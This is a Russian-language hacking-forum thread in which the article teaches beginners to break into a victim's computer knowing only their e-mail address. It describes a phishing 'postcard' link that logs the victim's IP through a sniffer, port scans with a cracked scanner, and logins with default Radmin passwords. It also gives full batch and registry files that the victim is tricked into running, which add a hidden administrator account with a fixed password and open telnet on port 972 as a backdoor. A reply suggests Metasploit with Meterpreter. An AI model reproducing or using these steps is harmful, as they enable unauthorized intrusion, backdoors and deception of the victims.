Инструкция взлома - Это пособия для безопасности!

Объявление

Hash Profit

Хочешь получить WMR бонус? Вот несколько рабочих WMR бонус программ, которые раздают бонусы за посещение их сайтов по 0.77 р., мало но каждый день что стоит кликать на кнопку и получать свой бонус, сколько накапает к примеру за месяц, за год?
worldwm
5-kopeek
icqmir
1 клик 1 wmr
3.03WMB

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Инструкция взлома - Это пособия для безопасности! » Новичкам » Взлом компьютера, зная только почту жертвы=Статья


Взлом компьютера, зная только почту жертвы=Статья

Сообщений 1 страница 2 из 2

1

Взлом компьютера, зная только почту жертвыСтатья о том, как получить полный доступ к чужому компьютеру, зная только e-mail.
====================================================
Содержание:

1.) Предисловие
2.) Узнаем IP
3.) Пользуемся разными прогами (анализ полученных данных)
4.) Если анализ ничего не дал?
5.) Краткая теория
6.) Послесловие

====================================================
1.) Предисловие.

Для того чтобы пользоваться этим методом, надо определиться, нужно ли это Вам в реальности, или Вам хочется просто развлечь себя и доказать, что Вы - лучший(ая). Последнее было для меня стимулом для того чтобы все это проделывать, но теперь я многое понял, а главное - понял то, что взлом не должен проводится чтобы доказать окружающим тебя людям, что ты "кулхацкер". Каким я себя не считаю. Многому надо научиться, и после практики, если все получилось, на мой взгляд, не надо от нечего делать взламывать чужие компьютеры. Итак, надеюсь с целью все определились, перейдем к действию?

====================================================
2.) Узнаем IP.

Надеюсь ни для кого не секрет, что без IP, мы не сможем найти нужный нам компьютер, и следовательно - провести взлом. Так как же его узнать?  Очень просто, нам потребуеются прямые руки, немного фантазии и онлайн сниффер.
Многие используют сниффер для увода cookies (куков, печенек, сессии - кому как нравится). Но в нашем случае, cookies нас не интересуют. Мы идем сюда и регистрируемся, если раньше этого не делали.

Онлайн-сниффер.

Отлично. Пол дела сделанно. Теперь идем в "настройки", при необходимости загружаем свое изображение. И нам дается ссылка на сниффер, с редиректом (перенаправлением) на нашу картинку. Не забудьте поставить галочку на "записывать IP в лог". Надеюсь поняли о чем я? Нет?! Тогда читайте.
Смысл в том, чтобы дать эту ссылку своей "жертве", но только со ссылкой cпрятанной в слове (изучаем html),Учебник по HTML Скачать а если в лом, то просто берете:

Здесь пишите любой текст, или одно слово

Пишите какой-нибудь текст (включайте фантазию). Возьмём самое простое:

===========
Здравствуйте! На Ваш E-mail адрес была отправленна открытка, чтобы посмотреть ее, нажмите сюда
===========

Это было самое легкое, советую придумать что-то более оригинальней. Всю эту муть отправляете жертве. При желании можно использовать сервисы анонимной отправки почты, или залить php скрипт, и самому сделать такой сервис.

Все, осталось жертве ПЕРЕЙТИ "посмотреть картинку", как IP палится в логе.
Не надо ничего никуда вводить, как в случае с фейком. В итоге все довольны, он (она), получила свою открытку, а Вы IP.

====================================================
3.) Пользуемся разными прогами (анализ полученных данных)

Теперь, у нас есть главное, без чего была бы невозможна дальнейшая работа. Дальнейшие действия - проверить хост (компьютер) на наличие уязвимостей - открытых портов. Я для этих целей пользуюсь сканером [XSpider 7.5], Вы можете использовать любой другой, на Ваш вкус. Но лучше всего использовать несколько сканеров, что не покажет один - покажет другой.

Сразу качаем себе [XSpider 7.5]Подробнее,Скачать
Обновлять не рекомендую, так как версия крякнутая, и полностью рабочая.

Теперь когда Вы скачали его, необходимо его настроить - создать новый профиль. Кто-то на сайте описывал настройку профиля, но чтобы Вам не приходилось искать статью, я Вам опишу настройку.

Открываете сканер
>>>Профиль
>>>Новый...
>>>Комментарий (пишите что хотите)
>>>Идете на вкладку "Сканер Портов", и внизу рядом с надписью "default.prt" давите [...]
>>>Выйдет окошко, давите "новый"
>>>Пустой
>>>В комментах пишите что угодно
>>>внизу увидеть "добавить порты" и пишите "4899" и "3389"
>>>Сохранить как "4899".
>>>Дольше выходите обратно на вкладки, и снимаете отовсюду галки.

Точно также создаете еще 1 профиль, только порт 23. Все.

Теперь вбиваете IP своей жертвы, в поле "добавить хост" и начинаете сканировать. Если вдруг открытым оказался один из портов 4899 - Radmin, 23 - telnet, 3389 - Remote Desktop (удаленный рабочий стол) - пробуете законнектиться (подключиться). Пароль по дефолту 12345678, об этом уже писалось. Самое лучшее (для меня), когда открыт 4899 порт (Radmin). Подключились? Радуйтсь!
Дальше можете делать все что Вашей душе угодно. Дальше читать не обязательно.

но чтобы не палиться, рекомендую Вам убрать иконку в трее (рядом с часиками), и создать нового пользователя, с правами администратора. (об этом между прочим тоже писалось раньше) - не буду писать, а то статья очень большая получится.

Remote Desktop входит в стандартную комплектацию Windows.
RAdmin Viewer можете скачать Здесь
В нем же есть и telnet
P>S
RAdmin тоже входит в стандартную комплектацию.

Если не получилось подключиться, не отчаиваемся, читаем дальше.

=====================================================
4.) Если анализ ничего не дал?

Если он ничего не дал, то можно своими усилиями помочь себе. Делается это просто, серверная часть устанавливается на удаленный компьютер/открывается нужный порт с нужным логином и паролем. Конечно, но как установить/открыть, если компьютер далеко???

- А для чего интернет?? WWW - World Wide Web - ВСЕМИРНАЯ паутина.
Через интернет тоже можно установить программу на чужой компьютер/или открыть доступ к уже существующему.
Radmin если что, тоже идет в стандартной комплектации Windows. А установить, что это действительно Windows, можно тем же сканером. Значит - нам остается только открыть доступ к этому сервису (23). Об этом до нас тоже позаботились, и написали вот такой *.txt файл, который в последствии переименовывается в *.bat.
Затем создается еще один файл, файл конфигурации реестра, который скрывает нового пользователя с глаз, и его не видно в окне приветствия.

содержимое *.bat файла

открыть|скрыть

chcp 1251
net user SUPPORT_388945a0 /delete
net user restot 12345678 /add
net localgroup Администраторы restot /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet

Этим файлом Вы создаете нового пользователя с именем restot и паролем 12345678
импортируете в реестр настройки, которые скроют Ваше имя в окне приветствия.
открываете 972 порт, и активируете телнет через него.

Записывается в блокнот, потом меняется расширение на *.bat

теперь содержимое файла conf.reg

открыть|скрыть

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
"restot"=dword:00000000

В последней строке, в кавычках, пишите имя, которое указали в *.bat файле.
также записываете в блокнот, а потом меняете расширение на *.reg

сохраняете все это в одной папке, можно просто заархивировать оба файла в один архив, а можно поступить умнее, скомпилировать файл *.bat в файл *.exe, и также добавить в архив поменяв иконку. После того как жертва запустит батник, можно будет коннектиться к 972 порту, или к любому другому, главное чтобы не был занят...

затем можно установить то что нужно через службу Telnet, и более комфортно управлять удаленной машиной.
==========================================================
5.) Краткая теориия|||
==================

находите жертву >>> узнаете ip >>> проверяете на наличие открытых портов >>> открываете порты (если открытых не было) >>> устанавливаете через telnet то что нужно для удобство >>> осуществляете свой злобный план..
==========================================================

Автор  Den2W

Отредактировано _XuMuK_ (2012-03-11 23:44:50)

0

2

Топ в целом ни о чём,нах снифер,если ip можно выдергнуть из входящего письма,даже если и кидать ссылку на сниф,то нах юзать сторонний сниф,если такой сниф пишется в десять строк.
Да и в целом ни о чём,не на каждой тачке стоит радмин или открыт телнет,даже наоборот практически у всех эти порты будут закрыты,с таким раскладом лучше юзать метасплоит и с полезной нагрузкой на метрепретер.

0


Вы здесь » Инструкция взлома - Это пособия для безопасности! » Новичкам » Взлом компьютера, зная только почту жертвы=Статья